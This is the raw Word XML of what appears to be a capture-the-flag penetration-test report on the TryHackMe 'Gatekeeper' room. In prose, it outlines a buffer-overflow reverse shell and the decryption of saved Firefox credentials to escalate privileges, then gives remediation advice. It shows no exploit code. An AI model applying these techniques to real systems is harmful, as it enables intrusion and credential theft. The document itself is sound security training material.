      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We were successfully able to copy it over into a lab environment. Some tests revealed a buffer-overflow vulnerability. The EIP was able to be manipulated and code, a reverse shell, we able to be added to the program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A450CD" w:rsidRDefault="00A450CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After the lab test was run on the Gatekeeper server and access was gained to a low user privilege account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A450CD" w:rsidRDefault="00A450CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Firefox information was downloaded and decrypted and a higher user privilege account username and password were revealed. Access to the machine was gained with these credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A450CD" w:rsidRDefault="00A450CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A450CD" w:rsidRDefault="00A450CD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security recommendations </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A450CD" w:rsidRDefault="00A450CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Restrict access to the SMB service. If there is a need for a guest share then care must be taken to what is placed in the folder. The guest share was not only 1 folder but also multiple system folders.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A450CD" w:rsidRDefault="00A450CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The gatekeeper software needs to be updated to protect against buffer overflow. This is directly software related.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A450CD" w:rsidRPr="00A450CD" w:rsidRDefault="00A450CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Firefox shared and saved information needs to be regularly cleared. Users should not use the same username and passwords while using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as what is their system username and password</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A450CD" w:rsidRPr="00A450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BBA"/>
    <w:rsid w:val="000852CA"/>
    <w:rsid w:val="003360EA"/>
    <w:rsid w:val="00354F37"/>
    <w:rsid w:val="00434A7E"/>
    <w:rsid w:val="006B34ED"/>
    <w:rsid w:val="00703B13"/>
    <w:rsid w:val="007D3312"/>
    <w:rsid w:val="009105CD"/>
    <w:rsid w:val="00956B2E"/>
    <w:rsid w:val="009702B2"/>
    <w:rsid w:val="00A450CD"/>
    <w:rsid w:val="00AB6E3D"/>
    <w:rsid w:val="00AF67F4"/>
    <w:rsid w:val="00B204D6"/>
    <w:rsid w:val="00B671C6"/>
    <w:rsid w:val="00B90C25"/>
    <w:rsid w:val="00B93B88"/>
    <w:rsid w:val="00BD0CD7"/>
    <w:rsid w:val="00D76BBA"/>
    <w:rsid w:val="00EC7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59F2E63-A125-41F9-94CC-8546CE7F9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702B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github.com/unode/firefox_decrypt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hyperlink" Target="https://tryhackme.com/room/gatekeeper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1901</TotalTime>
  <Pages>18</Pages>
  <Words>733</Words>
  <Characters>4182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Owner</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Owner</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-18T21:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-20T05:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>